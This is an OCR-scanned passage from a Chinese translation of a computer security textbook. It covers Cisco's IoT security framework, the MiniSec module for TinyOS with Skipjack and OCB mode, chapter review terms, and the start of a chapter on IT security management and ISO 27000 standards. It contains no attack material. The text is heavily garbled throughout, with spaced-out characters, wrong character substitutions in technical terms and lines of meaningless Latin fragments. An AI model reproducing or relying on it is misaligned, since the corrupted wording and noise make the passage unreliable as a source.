将 收集 有 关 个 人 的 大 量 数 据 ， 包 括 医疗 信息 、 位 置 和 移动 信息 以 及 应 用 程序 使 用 情况 。 


13.5.3 ”一 个 loT 安全 框架 


思科 开发 了 IoT 安全 框架 [ERAH15]， 作 为 IoT 安全 要 求 的 有 用 指南 。 图 13-12 显示 了 与 
IoT 逻辑 结构 相关 的 安全 环境 。IoT 模型 是 世界 论坛 IoT 参考 模型 (World Forum IoT Reference 
Model) 的 简化 版 本 。 它 由 以 下 几 个 层次 组 成 : 


智能 对 象 / 嵌入 式 系统 (smart object/embedded system): 由 网 络 边缘 的 传感器 、 执 行 器 
AIA hi ASA SAM. AE IoT 最 脆弱 的 部 分 ， 设 备 可 能 不 在 物理 安全 环境 中 并 且 
可 能 需要 运行 多 年 。 可 用 性 当然 是 一 个 重要 问题 ， 网 络 管理 员 还 需要 关注 传 感 需 产生 
的 数据 的 真实 性 和 完整 性 ， 以 及 保护 执行 器 和 其 他 智能 设备 免 受 未 经 授权 的 使 用 ， 可 
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e 要 /边缘 网 络 (fog/edge network): 该 层次 涉及 物 联网 设备 的 有 线 和 无 线 互联 。 男 外 ， 
在 这 个 层次 上 可 以 完成 一 定数 量 的 数据 处 理 和 合并 。 关 键 问 题 是 各 种 IoT 设备 使 用 不 
同 的 网 络 技 术 和 协议 ， 需 要 制定 和 实施 一 个 统一 的 安全 策略 。 

© 核心 网 络 (core network): 核心 网 络 层次 提供 网 络 中 心平 台 与 IoT 设备 之 间 的 数据 路 径 . 
这 里 的 安全 问题 是 传统 核心 网 络 面临 的 问题 。 但 是 ， 大 量 端点 需要 与 之 交互 和 管理 ， 
这 会 造成 很 大 的 安全 负担 。 

e 数据 中 心 / 云 (data center/cloud): 该 层次 包含 应 用 程序 、 数 据 存储 和 网 络 管理 平台 。 
除了 需要 处 理 大 量 个 人 端点 之 外 ，IoT 并 没有 在 这 个 层面 引入 任何 新 的 安全 问题 。 


核心 网 络 


智能 对 象 





图 13-12 loT 安全 环境 


在 这 个 四 层 体系 结构 中 ， 思 科 模 型 定义 了 四 个 跨越 多 个 层次 的 通用 安全 功能 : 

e 基于 角色 的 安全 性 (role-based security): RBAC 系统 为 角色 而 不 是 单个 用 户 分 配 访 问 
权限 。 反 过 来 ， 根 据 用 户 的 职责 ， 用户 可 以 静态 或 动态 地 被 分 配 到 不 同 角 色 。RBAC 
在 云 和 企业 系统 中 享有 广泛 的 商业 用 途 ， 是 一 种 广为人知 的 工具 ， 可 用 于 管理 对 物 联 


网 设备 及 其 生成 的 数据 的 访问 。 
。 防 算 改 和 检测 : 此 功能 在 设备 和 雾 网 络 
层面 尤为 重要 ， 但 也 延伸 至 核心 网 络 层 包括 可 见 性 和 控制 在 内 的 安全 分 析 





面 。 所 有 这 些 层次 都 可 能 涉及 物理 上 位 
于 企业 区 域外 的 受 物 理 安全 措施 保护 的 
组 件 。 
数据 保护 和 机 密 性 : 这 些 功能 可 扩展 到 
所 有 架构 级 别 。 

e IPP: 在 各 个 层面 上 保护 传输 中 的 数 

HE AS Se Ell Bi UT ABR 

图 13-12 映射 了 IoT 模型 四 层 的 特定 安全 
功能 区 域 。[FRAH15] 还 提出 了 一 个 安全 的 IoT 
框架 ,该 框架 为 包含 所 有 层次 的 IoT 定 义 了 安 
全 设施 的 组 件 ， 如 图 13-13 所 示 。 这 四 个 组 件 | > 
如 下 : 图 13-13 ”安全 的 IoT 框架 


MERA 


#13% Zlo A 321 


e 认证 (authentication) : 首先 通过 识别 IoT 设备 来 确定 是 否 已 经 注册 。 和 典型 的 企业 网 络 
设备 可 以 通过 人 工 凭 证 (例如 ， 用 户 名 和 口令 或 令 牌 ) 进行 认证 。 与 之 相 比 ，IoT 终端 
可 以 通过 不 需要 人 工交 互 的 指纹 识别 方式 进行 认证 。 这 些 标识 器 包括 RFID. X.509 证 
书 或 端点 的 MAC 地 址 。 

e 授权 (authorization): 控制 整个 网 络 结构 中 的 设备 访问 ， 包 含 访 问 控制 。 授 权 与 认证 一 
起 确立 必要 的 参数 以 实现 设备 与 设备 之 间 以 及 设备 与 应 用 平台 之 间 的 信息 交互 ， 并 使 
IoT 相关 服务 得 以 执行 。 

e 网 络 强制 策略 : 保证 所 有 的 组 件 安 全 地 发 送 和 传输 端点 流量 通过 基础 设施 ， 无 论 是 控 
制 、 管 理 还 是 实际 数据 流量 。 

e 包括 可 见 性 和 控制 在 内 的 安全 分 析 : 该 组 件 包 括 集中 管理 IoT 设备 所 需 的 全 部 功能 。 
首先 涉及 IoT 设备 的 可 见 性 ， 这 仅仅 意味 着 中 央 管 理 服 务 可 以 安全 地 了 解 分 布 式 IoT 
设备 集合 ， 包 括 每 个 设备 的 ID 和 属性 。 基 于 这 种 可 见 性 ， 可 以 施加 控制 ， 包 括 配置 、 
补丁 更 新 和 反 威 胁 对 策 。 

与 这 个 框架 有 关 的 一 个 重要 概念 是 信任 关系 。 在 这 种 情况 下 ， 信 任 关系 是 指 两 个 合作 伙伴 
交换 对 为 一 方 的 喘 份 信任 和 访问 权 的 能 力 。 信 任 框 架 的 认证 组 件 提 供 了 一 个 基本 的 信任 级 别 ， 
该 信任 级 别 由 授权 组 件 扩展 而 成 。[FRAH15] 举例 说 明了 一 辆 汽车 可 能 与 同一 提供 者 的 另 一 辆 
汽车 建立 信任 关系 。 但 是 ， 这 种 信任 关系 可 能 只 允许 汽车 交换 它们 的 安全 能 力 。 当 同一 辆 汽车 
与 其 经 销 商 的 网 络 之 间 建 立 了 信任 关系 时 ， 汽 车 可 以 被 允许 共享 附加 信息 ， 如 里 程 表 读数 和 上 
次 维护 记录 。 


13.5.4 ”一 个 开源 的 loT 安全 模块 


本 小 节 概 述 MiniSec， 它 是 一 个 开源 安全 模块 ， 是 TinyOS 操作 系统 的 一 部 分 。TinyOS 
是 为 小 型 的 舱 入 式 系 统 设计 的 ,但 它 对 存储 器 、 处 理 时 间 、 实 时 响应 和 功 耗 都 有 严格 要 
求 。TinyOS 采用 相当 精简 的 流程 ， 因 此 是 适用 于 骨 入 式 系统 的 非常 小 的 操作 系统 ， 其 典型 
配置 只 需要 48 KB 的 代码 和 10 KB 的 RAM [LEVI12]. TinyOS 的 主要 应 用 是 无 线 传感器 
网 络 ， 它 已 经 成 为 这 种 网 络 的 实际 操作 系统 。 传 感 问 网 络 的 主要 安全 问题 与 无 线 通信 有 关 。 
MiniSec 被 设计 成 链 路 级 模块 ， 提 供 高 级 别 的 安全 性 ， 同 时 保持 低能 耗 并 使 用 很 少 的 内 存 
[LUK07]. MiniSec 提供 机 密 性 、 认 证 和 重 放 保 护 。 

MiniSec 有 两 种 工作 模式 : 一 种 适用 于 单 源 通信 ， 另 一 种 适用 于 多 源 广 播 通信 。 后 者 不 需 
要 按 发 送 者 状态 进行 重 放 保护 ， 从 而 可 以 扩展 到 大 型 网 络 。 

MiniSec 则 在 满足 以 下 要 求 : 

e 数据 认证 (data authentication): 使 一 个 合法 节点 能 够 验证 消息 是 否 源 自 另 一 个 合法 节 

点 〈 即 与 其 共享 密 钥 的 节点 )， 并 且 在 传输 过 程 中 保持 不 变 。 

e 机 密 性 (confidentiality): 任何 安全 通信 系统 的 基本 要 求 。 

© 重 放 保护 (replay protection): 防止 攻击 者 成 功 记录 数据 包 并 在 以 后 重 放 。 

o 新 鲜 度 (freshness): 由 于 传感器 节点 通常 会 传输 时 变 测量 数据 ， 因 此 提供 消息 新 鲜 度 
的 保证 是 一 个 重要 属性 。 新 鲜 度 有 两 种 : RAGS. MiniSec 提供 了 一 种 保证 弱 新 鲜 度 的 
机 市， 接收 器 可 以 在 没有 本 地 参考 时 间 点 的 情况 下 确定 接收 到 消息 的 偏 序 关系 。 
低能 耗 开销 (low energy overhead): 这 是 通过 最 小 化 通信 开销 并 仅 使 用 对 称 加 密 方法 来 
实现 的 。 
e 对 丢失 消息 可 恢复 性 (resilient to lost message): 在 无 线 传感器 网 络 中 丢失 数据 包 的 发 

生 率 相对 较 高 ， 这 需要 一 个 能 够 承受 高 消息 丢失 率 的 设计 。 


322 RZAD KY RRAKSE 


密码 算法 MiniSec 使 用 的 两 种 密码 算法 值得 注意 。 其 中 第 一 个 是 加 密 算法 Skipjack, 
Skipjack 是 由 美国 国家 安全 局 ( National Security Agency, NSA) 在 20 世纪 90 年 代 开 发 的 。 它 
是 最 简单 和 最 快 的 分 组 密码 算法 之 一 ， 对 仍 人 式 系 统 至 关 重 要 。 针 对 无 线 安全 网 络 [LAW06] 
的 8 种 可 能 候选 算法 的 研究 得 出 的 结论 是 ， 在 代码 存储 占 、 数 据 存储 器 、 加 密 /解密 效率 和 关 
键 设 置 效 率 等 方面 ，Skipjack 是 最 好 的 算法 。 

Skipjack 使 用 80 位 密 铀 。NSA 打算 在 只 有 56 位 密 钥 的 DES 存在 漏洞 时 提供 安全 系 
统 。 当 代 算 法 (如 AES) 使 用 的 密 钥 长 度 至 少 为 128 位 ， 并 且 通 常 认 为 80 位 是 不 够 的 。 但 
是 ， 对 于 无 线 传 感 器 网 络 和 其 他 IoT 设备 的 有 限 应 用 ， 通 过 慢 速 数据 链 路 提供 大 量 短 数 据 块 ， 
Skipjack 是 足够 的 。 和 凭借 其 高 效 的 计算 性 能 和 较 低 的 内 存 占 用 ，Skipjack 是 IoT 设备 的 一 个 非 
常 有 吸引 力 的 选择 。 

为 MiniSec 选择 的 分 组 密码 操作 模式 是 偏 移 密码 本 ( Offset Codebook, OCB) 模式 。 正 如 
第 2 章 中 所 提 到 的 ， 当 明文 源 由 多 个 用 同一 加 密 密 钥 加 密 的 数据 块 组 成 时 ， 必 须 指 定 一 种 操作 
模式 。 假 设 底层 分 组 密码 安全 ，OCB 模式 是 安全 可 靠 的 。OCB 模式 是 一 种 一 次 性 操作 模式 ， 
这 使 其 高 效 。 每 个 纯 文本 块 只 需要 一 次 块 密码 调用 (需要 额外 两 次 调用 才能 完成 整个 加 密 过 
程 )。OCB 特别 适用 于 传感器 节点 有 严格 能 量 限制 的 情况 。 

一 个 对 OCB 效率 有 显著 贡献 的 特性 是 ， 传 递 一 次 明文 块 序 列 时 ， 它 会 产生 一 个 长 度 相同 
的 密 文 和 一 个 用 于 验证 的 标签 。 为 了 解密 密 文 ， 接 收 者 执行 逆 过 程 来 恢复 明文 。 然 后 ， 接 收 者 
确保 标签 符合 预期 。 如 果 接 收 者 计算 的 标签 不 是 伴随 密 文 的 标签 ， 则 认为 密 文 是 无 效 的 。 因 
此 ， 消 息 认 证 和 消息 机 密 性 都 是 通过 一 个 简单 的 算法 实现 的 。OCB 将 在 第 21 章 中 介绍 。 

MiniSec 采用 每 个 设备 的 密 钥 ， 也 就 是 说 ， 每 个 密 钥 对 于 特定 的 一 对 设备 是 唯一 的 ， 以 防 
止 重 放 攻 击 。 

操作 模式 ”MiniSec 有 两 种 操作 模式 : 单 播 (MiniSec-U) 和 广播 (MiniSec-B )。 两 种 操作 
模式 都 使 用 带 有 计数 器 的 OCB, it CAE APRA nonce (随机 数 )， 随 同 明 文 一 起 输入 到 加 密 算 法 
中 。 计 数 需 的 最 低 有 效 位 也 以 明文 形式 发 送 ， 用 于 同步 。 对 于 这 两 种 模式 ， 数 据 都 是 以 包 的 形 
式 传 输 。 每 个 数据 包 都 包含 加 密 数 据 块 、OCB 认证 标签 和 MiniSec HRA o 

MiniSec-U 采用 同步 计数 器 ， 这 要 求 接收 者 为 每 个 发 送 者 保留 一 个 本 地 计数 器 。 严 格 单调 
递增 的 计数 器 保证 了 语义 机 密 性 5。 即使 发 送 者 A 重复 发送 相同 的 消息 ， 每 个 密 文 也 是 不 同 
的 ， 因 为 使 用 了 不 同 的 计数 器 值 。 另 外 ， 一 旦 接收 者 观察 到 计数 器 值 ， 那 么 它 将 拒绝 具有 相同 
或 更 小 计数 需 值 的 数据 包 。 因 此 ， 攻 击 者 无 法 重 放 接 收 者 先前 收 到 的 任何 数据 包 。 如 果 有 多 个 
数据 包 被 丢弃 ， 那 么 发 送 者 和 接收 者 都 将 参与 再 同步 协议 。 

MiniSec-U 不 能 直接 用 于 保护 广播 通信 。 首 先 ， 在 许多 接收 者 中 运行 计数 右 再 同步 协议 的 
成 本 比较 高 。 其 次 ， 如 果 一 个 节点 要 同时 接收 来 自 大 量 发 送 节 点 的 数据 包 ， 则 需要 为 每 个 发 
送 者 维护 一 个 计数 器 ， 从 而 导致 较 高 的 内 存 开销 。 为 此 ， 它 使 用 两 种 机 制 一 种 基于 时 间 
的 方法 和 一 种 布 隆 过 滤器 方法 ， 可 以 防御 重 放 攻击 。 首 先 ， 将 时 间 划 分 为 长 度 为 上 的 时 段 El， 
E2, …。 使 用 当前 时 段 或 前 一 时 段 作为 OCB 加 密 的 nonce， 可 避免 旧时 段 消息 的 重播 。 为 了 
防止 当前 时 段 内 的 重 放 攻 击 ， 定 时 方法 增加 了 布 隆 过 滤 需 方法 。MiniSec-B 在 OCB 加 密 中 使 
用 nonce 元 素 ， 布 隆 过 滤器 使 用 字符 串 nodeID.Ei.Cab 作为 键 ， 其 中 nodeID 是 发 送 者 节点 标识 
符 ，Ei 是 当前 时 段 ，Cab 是 共享 计数 占 。 每 次 节点 收 到 消息 时 ， 它 都 会 检查 节点 是 否 属于 其 布 
隆 过 滤器 。 如 果 消 息 没 有 重 放 ， 则 存储 在 布 隆 过 滤 需 中 。 否 则 ， 节 点 将 其 删除 。 

有 关 这 两 种 操作 模式 的 更 多 详细 内 容 ， 请 参见 [TOBA07]。 





O 语义 机 密 性 意味 着 如 果 相 同 的 明文 被 加 密 两 次 ， 则 两 个 结果 密 文 是 不 同 的 。 


13.6 关键 术语 和 复习 题 


关键 术语 

actuator (执行 咽 ) 

backbone (骨干 网 络 ) 

cloud auditor ( 云 审 计 者 ) 

cloud broker ( 云 经 纪 人 ) 

cloud carrier ( 云 运营 者 ) 

cloud computing ( 云 计 算 ) 

Cloud Service Consumer (CSC， 云 服务 客户 ) 

Cloud Service Provider (CSP， 云 服务 提供 者 ) 

community cloud (社区 云 ) 

core (核心 ) 

Data Loss Prevention (DLP， 数 据 损失 防范 ) 

edge (边缘 ) 

fog (35) 

hybrid cloud ( 混合 云 ) 

Identity and Access Management (IAM, 44 ft Alii 
问 管理 ) 

Infrastructure as a Service (JaaSs ， 基 础 设施 即 服务 ) 

Internet of Things (IoT， 物 联网 ) 

intrusion management (入 侵 管 理 ) 


复 习题 

定义 云 计 算 。 

列 出 并 简要 定义 三 种 云 服 务 模 型 。 
什么 是 云 计 算 参 考 架构 ? 

描述 一 些 云 特 有 的 主要 安全 威胁 。 
什么 是 OpenStack ? 

定义 物 联 网 。 


13.1 
13.2 
13.3 
13.4 
13.5 
13.6 
13.7 
13.8 ”定义 修补 漏洞 。 

13.9 什么 是 物 联网 安全 框架 ? 
13.10 ”什么 是 MiniSec ? 
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microcontroller ( 微 控制 器 ) 

multi-instance model (多 实例 模型 ) 

mnulti-tenant model (多 租户 模型 ) 

patching vulnerability (修补 漏洞 ) 

platform as a service (PaaS ， 平 台 即 服务 ) 

private cloud (WAZ) 

public cloud (公共 云 ) 

Radio-Frequency IDentification (RFID, ， 射 频 识 别 ) 

Security as a Service (SecaaS ， 安 全 即 服务 ) 

security assessments (安全 评估 ) 

Security Information and Event Management ( SIEM, 
安全 信息 和 事件 管理 ) 

sensor (传感器 ) 

service arbitrage (服务 套利 ) 

service aggretation (服务 聚合 ) 

service intermediation (服务 中 介 ) 

Software as a Service (SaaS， 软 件 即 服务 ) 

transceiver (收发 器 ) 


列 出 并 简要 定义 物 联 化 (IoTenabled) 事物 的 主要 组 件 。 





| 第 三 部 分 


Computer Security: Principles and Practice, 4th Edition 


管理 问题 





第 14 音 | 


Computer Security: Principles and Practice, 4th Edition 


IT 安全 管理 与 风险 评估 





学 习 目 标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
o 理解 IT 安全 管理 涉及 的 过 程 ; 
描述 组 织 的 IT 安全 目标 、 战 略 和 方针 ; 


详细 描述 IT 安全 风险 评估 的 可 选 方法 ; 

详细 描述 形式 化 IT 安全 风险 评估 所 需 步 骤 ; 
描述 已 识别 威胁 和 后 果 的 特征 ， 并 确定 风险 ; 
详细 描述 风险 处 置 可 选 方案 。 





在 前 面 各 章 中 ， 我们 讨论 了 一 系列 可 以 用 于 管理 和 提高 计算 机 系统 和 网 络 安全 的 技术 和 管 
理 措施 。 在 本 章 和 下 一 章 中 ,我 们 将 重点 讨论 如 何 对 这 些 措施 进行 最 优选 择 并 付 诸 实施 ， 以 有 
效 地 满足 组 织 的 安全 要 求 的 过 程 。 正 如 第 1 章 中 提 到 的 ， 这 涉及 如 下 三 个 基本 问题 : 

1. 哪些 资产 需要 保护 ? 

2. 这 些 资产 受到 哪些 威胁 ? 

3. 如 何 应 对 这 些 威胁 ? 

IT 安全 管理 是 回答 上 述 问题 的 形式 化 过 程 ， 它 能 够 确保 关键 资产 以 最 经 济 的 方式 得 到 充 
分 保护 。 更 确切 地 说 ，IT 安全 管理 由 以 下 一 些 步骤 组 成 。 首 先 ， 为 组 织 的 IT 安全 目标 和 总 体 
风险 状况 确定 一 个 清晰 的 视图 。 然 后 ， 对 组 织 中 每 个 需要 保护 的 资产 进行 T 安全 风险 评估 ， 
通过 评估 回答 上 述 三 个 关键 问题 。 风 险 评估 提供 了 必要 的 信息 ， 以 决定 要 将 已 识别 的 风险 降低 
到 可 以 接受 的 水 平 或 者 接受 最 终 风 险 ， 需 要 采取 哪些 管理 、 运 行 和 技术 控制 措施 。 接 下 来 的 步 
又 是 选择 适当 的 控制 ， 并 编写 计划 和 规程 以 确保 这 些 必 要 的 控制 措施 被 有 效 地 实施 。 必 须 对 实 
施 过 程 进行 监视 ， 以 确定 是 否 满足 安全 目标 。 由 于 技术 和 风险 环境 都 在 快速 变化 ， 因 而 整个 
过 程 必须 循环 往复 ， 保 持 计划 和 规程 不 断 更 新 。 该 过 程 的 后 半 部 分 内 容 将 在 第 15 章 中 讨论 。 
随后 各 章 将 阐述 具体 的 控制 域 ， 第 16 章 介绍 物理 安全 ， 第 17 章 介 绍 人 为 因素 ， 第 18 章 介 绍 
审计 。 


14.1 IT 安全 管理 


最 近 几 十 年 ， 随 着 网 络 化 计算 机 系统 的 快速 发 展 及 对 其 依赖 性 的 增强 ， 与 之 相关 的 风险 
也 不 断 增长 ，IT 安全 管理 发 生 了 很 大 的 变化 。 在 过 去 的 十 年 中 ， 大 量 美国 国家 标准 和 国际 标 
准 陆 续 出 台 。 这 代表 了 对 这 一 领域 的 最 佳 实践 所 达成 的 共识 。 国 际 标准 化 组 织 ( International 
Standards Organization, ISO) 对 这 些 标准 进行 了 修订 并 整合 而 成 ISO 27000 系列 。 表 14-1 
详细 地 列 出 了 该 标准 族 中 最 近 被 采用 的 标准 。 在 美国 ，NIST 也 制定 了 许多 相关 的 标准 ， 包 
括 NIST SP 800-18 (联邦 信息 系统 安全 计划 开发 指南 ，2006 年 2 月 )、NIST SP 800-30 ( 风 
险 评估 指南 ，2012 年 9 月 ) 以 及 NIST SP 800-53 (联邦 信息 系统 和 组 织 的 安全 和 隐私 控制 ， 
2015 年 1 月 )。NIST 还 于 2014 年 发 布 了 “提高 关键 基础 设施 网 络 安全 框架 "(Framework for 
Improving Critical Infrastructure Cybersecurity)， 为 组 织 系统 管理 网 络 安全 风险 提供 指导 。 随 
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着 全 球 金融 危机 等 事件 频 发 以 及 政府 机 构 和 其 他 企业 对 个 人 信息 泄露 的 重复 发 生 ， 公 众 对 公 
司 治理 的 担忧 加 剧 ， 于 是 这 些 组 织 的 审计 人 员 越 来 越 多 地 被 要 求 遵 守 这 些 正式 标准 。 


表 14-1 关于 IT 安全 技术 的 1SO/IEC 27000 系列 标准 


27000.2016 | “信息 安全 管理 体系 一 概述 与 词汇 ”提供 了 信息 安全 管理 体系 的 概述 ， 定 义 了 27000 系列 


标准 中 使 用 的 词汇 和 定义 

27001:2013 “信息 安全 管理 体系 一 一 需求 ”规定 了 人 建立、 实施、 操作、 监督、 审核 、 维 护 和 改进 文件 化 
l 信息 安全 管理 体系 的 要 求 

27002:2013 “信息 安全 管理 实施 细则 ”为 组 织 内 的 信息 安全 管理 提供 了 指导 方针 ， 并 包含 了 最 佳 实践 安 
| 全 控制 的 清单 。 以 前 称 为 ISO 17799 

27003:2010 “信息 安全 管理 体系 实施 指南 ” 详 述 了 信息 安全 管理 体系 规范 及 其 设计 的 过 程 ， 从 开始 到 产 
l 生 实 施 计划 

27004:2009 “信息 安全 管理 ; 测量 ”对 帮助 组 织 测量 和 报告 其 信息 安全 管理 体系 过 程 和 控制 措施 的 有 效 
性 提供 了 指导 

27005:2011 “信息 安全 风险 管理 ”提供 了 有 关 信 息 安 全 风险 管理 过 程 的 指南 ， 它 替代 了 ISO 13335-3/4 

27006:2015 “提供 信息 安全 管理 体系 审计 和 认证 的 机 构 要 求 ” 规 定 了 这 些 机 构 的 要 求 并 为 其 提供 了 指导 


针对 我 们 的 目的 ， 可 以 定义 IT 安全 管理 如 下 : 


IT 安全 管理 : 通过 保留 其 机 密 性 、 完 整 性 、 可 用 性 、 问 责 性 、 真 实 性 和 和 可靠 性 ， 用 于 开发 
和 维护 组 织 资产 的 适当 级 别 计算 机 安全 的 正式 流程 。IT 安全 管理 流程 中 的 步骤 包括 : 
© 确定 组 织 的 IT 安全 目标 、 战 略 和 方针 。 

执行 IT 安全 风险 评估 ， 分析 组 织 内 IT 资产 的 安全 威胁 ， 并 确定 由 此 产生 的 风险 。 


选择 合适 的 控制 措施 以 有 效 保护 组 织 的 IT 资产。 
编写 计划 和 程序 以 有 效 实 施 选 定 的 控制 措施 。 
实施 选 吓 的 控制 措施 ， 包 括 提供 安全 意识 和 培训 计划 。 
监控 所 选 控制 器 的 操作 并 保持 其 有 效 性 。 
检测 和 响应 事件 。 


图 14-1 (改编 自 ISO 27005 图 1 (信息 安全 风险 管理 ，2011 Æ) 和 ISO 13335 第 3 部 分 图 1 
(信息 与 通信 技术 安全 管理 ，2004 年 )) 说 明了 这 个 过 程 ， 其 中 特别 说 明了 与 风险 评估 过 程 相关 
的 内 部 细节 。 应 该 强调 的 是 ，IT 安全 管理 有 必要 成 为 组 织 整体 管理 计划 的 一 个 关键 组 成 部 分 。 
类 似 地 ，IT 安全 风险 评估 过 程 也 应 当 被 纳入 对 组 织 的 全 部 资产 和 业务 过 程 实施 的 更 广泛 的 风 
险 评估 之 中 。 因 此 ， 如 果 IT 安全 管理 过 程 得 不 到 组 织 高 级 管理 层 的 重视 和 文 持 ， 就 不 大 可 能 
达到 期 望 的 安全 目标 ， 也 不 能 为 组 织 的 业务 成 果 做 出 适当 的 贡献 。 同 样 需 要 注意 的 是 ，IT 管 
理 并 非 一 劳 永 逸 的 事情 ， 而 是 一 个 循环 过 程 ， 必 须 不 断 地 重复 ， 这 样 才能 与 IT 技术 和 风险 环 
境 的 快速 变化 保持 同步 。 

IT 安全 管理 过 程 的 重复 性 本 质 是 ISO 31000 (风险 管理 : 原则 和 指南 ，2009 年 ) 的 重点 ， 
特别 适用 于 ISO 27005 中 的 安全 风险 管理 过 程 。 该 标准 详细 描述 了 管理 信息 安全 的 建 模 过 程 ， 
包括 以 下 步 又 9: 

规划 (Plan): 建立 安全 方针 、 目 标 、 过 程 和 规程 ; 开展 风险 评估 ; 开发 选择 恰当 控制 措施 
或 者 接受 风险 的 风险 处 置 计划 。 





O Käik ISO 27005 # 1 #1 ISO 31000 图 1 部 分 。 


328 AD 管理 问题 


实施 (Do): 实施 风险 处 置 计划 。 
E (Check): 监督 和 维护 风险 处 置 计划 。 
处 置 (Act): 根据 事件 、 评 审 或 可 识别 的 变更 ,维护 和 改进 信息 安全 风险 管理 过 程 。 





3 E 


= =e 
| 安全 风险 分 析 









(基线 ) [ 非 形式 化 ] 形式 化 ] 组合 ] 







图 14-1 IT 安全 管理 概述 


图 14-2 说 明了 这 个 过 程 ， 与 图 14-1 是 一 致 的 。 这 个 过 程 的 结果 应 当 是 使 得 相关 方 的 安全 
需求 都 得 到 了 适当 的 管理 。 


相关 方 相关 方 





信息 
安全 安全 
需求 管理 


图 14-2 “规划 - 实施 - 检查 - 处 置 ”过 程 模型 
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14.2 组织 的 情境 和 安全 方针 


IT 安全 管理 过 程 的 第 一 个 步骤 是 从 组 织 的 总 体 风 险 状 况 出 发 ,研究 制定 组 织 的 IT 安全 目 
标 、 战 略 和 方针 。 作 为 组 织 管 理 的 一 部 分 ， 其 只 能 在 更 广泛 的 组 织 管理 目标 和 政策 的 背景 下 进 
行 。 组 织 的 安全 目标 确定 了 应 当 取 得 什么 样 的 IT 安全 结果 。 为 了 支持 组 织 的 总 体 上 和 目标， 它们 
需要 处 理 组 织 必须 保证 的 个 体 权利 、 法 律 要 求 和 标准 。 组 织 的 安全 战略 确定 了 怎样 才能 达成 这 
些 安全 目标 。 组 织 的 安全 方针 确定 了 需要 做 什么 。 这 些 目 标 、 战 略 和 方针 需要 维持 并 依据 阶段 
性 安全 评审 的 结果 进行 定期 升级 ， 以 应 对 不 断 变化 的 技术 和 风险 环境 。 

为 了 帮助 确定 组 织 的 这 些 安全 目标 ， 需 要 分 析 组 织 内 信息 系统 的 角色 和 重要 性 。 这 些 系统 
的 价值 需要 从 支持 组 织 实现 其 目标 方面 重新 审视 ， 而 不 是 只 考虑 系统 的 直接 成 本 。 以 下 几 个 问 
题 对 阐明 这 一 点 有 所 帮助 : 

e 组 织 中 的 哪些 关键 方面 需要 IT 支持 ， 以 有 效 地 实现 其 功能 ? 
哪些 工作 只 能 在 IT 支持 下 执行 ? 

哪 项 重要 决策 依赖 于 信息 系统 所 管理 数据 的 准确 性 、 流 通 性 、 完 整 性 或 可 用 性 ? 
哪些 由 信息 系统 创建 、 管 理 、 运 行 和 存储 的 数据 需要 加 以 保护 ? 

e 组 织 的 信息 系统 出 现 安全 故障 时 会 给 组 织带 来 什么 后 果 ? 

如 果 以 上 某 些 问题 的 答案 表明 信息 系统 对 组 织 实现 其 目标 而 言 是 重要 的 ， 那么 显然 应 当 评 
估 组 织 的 风险 ， 并 采取 适宜 的 措施 来 处 理 已 识别 的 缺陷 。 以 上 分 析 人 研究 的 结果 应 该 是 组 织 的 天 
键 安 全 目标 列表 。 

一 旦 列 出 了 目标 ， 就 可 以 形成 一 些 更 广泛 的 战略 表述 。 这 些 战略 表述 从 总 体 上 勾画 出 整个 
组 织 如 何以 一 致 的 方式 来 实现 确定 的 目标 。 战 略 表述 的 主题 和 细节 由 已 确定 的 目标 、 组 织 的 规 
模 和 信息 系统 对 组 织 的 重要 性 来 确定 。 战 略 表述 应 当 提 及 组 织 用 来 管理 其 信息 系统 安全 的 方法 。 

有 了 组 织 的 安全 目标 和 战略 ， 就 可 以 制定 组 织 的 安全 方针 。 安 全 方针 描述 了 什么 是 目标 和 
战略 ， 以 及 实现 它们 的 过 程 。 组 织 或 公司 的 安全 方针 可 能 是 一 份 单独 的 大 文件 ， 或 者 更 多 情况 
下 是 一 套 相 关 的 文件 。 安 全 方针 通常 至 少 需要 说 明 下 列 主题 2 
方针 的 范围 和 目的 。 
安全 目标 与 组 织 的 法 律 法 规 义 务 及 业务 目标 的 关系 。 

e 从 保密 性 、 完 整 性 、 可 用 性 、 可 核查 性 、 真 实 性 、 可 靠 性 等 方面 特别 是 从 资产 所 有 制 
的 角度 考虑 的 IT 安全 要 求 。 

与 IT 安全 管理 和 组 织 基 础 设施 相关 的 职责 分 配 。 
组 织 所 采用 的 风险 管理 方法 。 

如 何 处 理 安全 意识 教育 和 培训 问题 。 

普通 人 员 特 别 是 受信 任 岗位 人 员 的 管理 问题 。 
员工 可 能 受到 的 法 律 处 罚 及 处 罚 的 适用 条 件 。 
系统 的 开发 和 采购 过 程 中 需要 考虑 的 安全 问题 。 
组 织 范 围 内 采用 的 信息 分 类 方案 的 定义 。 

应 急 和 业务 连续 性 规划 。 

事件 检测 和 处 置 过 程 。 

评审 方针 的 方法 和 时 间 。 

控制 方针 变更 的 方法 。 


O KAH ISO 13335 多 个 章节 的 细节 规定 。 
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制定 方针 的 目的 是 对 组 织 的 IT 基础 设施 如 何 大 体 上 支持 其 总 体 业 务 目标 做 出 清晰 的 概括 ， 
更 具体 地 说 ， 就 是 为 了 使 这 种 文 持 的 效果 达到 最 佳 ， 必 须要 提出 哪些 安全 要 求 。 

术语 “ security policy”s 也 用 在 其 他 语 境 中 。 以 前 ， 组 织 的 安全 策略 (security policy) 是 
指 既 包括 总 体 安 全 目标 和 战略 也 包括 诸如 已 定义 的 可 接受 行为 、 预 期 实践 和 职责 等 规程 性 策略 
的 文件 。RFC 2196 (站 点 安全 手册 ，1997 年 ) 描述 了 这 种 形式 的 策略 。” security policy” 的 这 
种 解释 是 在 本 章 描述 的 作为 过 程 的 IT 安全 管理 的 形式 规范 之 前 出 现 的 。 尽 管 从 以 前 的 “策略 ” 
发 展 到 我 们 现在 所 说 的 “方针 ”应 该 经 过 一 系列 过 程 ， 但 是 这 里 没有 详细 的 资料 。 这 样 一 份 策略 
的 内 容 通常 包括 ISO 27002, FIPS 200 和 NIST SP 800-53 等 标准 中 的 很 多 控制 域 ， 这 些 内 容 将 在 第 
15 ~ 18 章 进一步 探讨 。 

上 述 组 织 安 全 策略 的 一 个 真实 例子 来 自 总 部 设 在 欧盟 的 一 家 工程 顾问 公司 ， 见 本 书 网 站 的 
高 级 内 容 部 分 (ComputerSecuirtyPolicypdf)。 出 于 某 些 考虑 ， 文 档 中 出 现 的 这 家 公司 的 名 字 都 改 
成 了 “ 某 公 司 ”。 该 公司 是 一 家 总 部 设 在 欧盟 的 工程 顾问 公司 ， 其 致力 于 为 全 世界 基础 设施 建设 
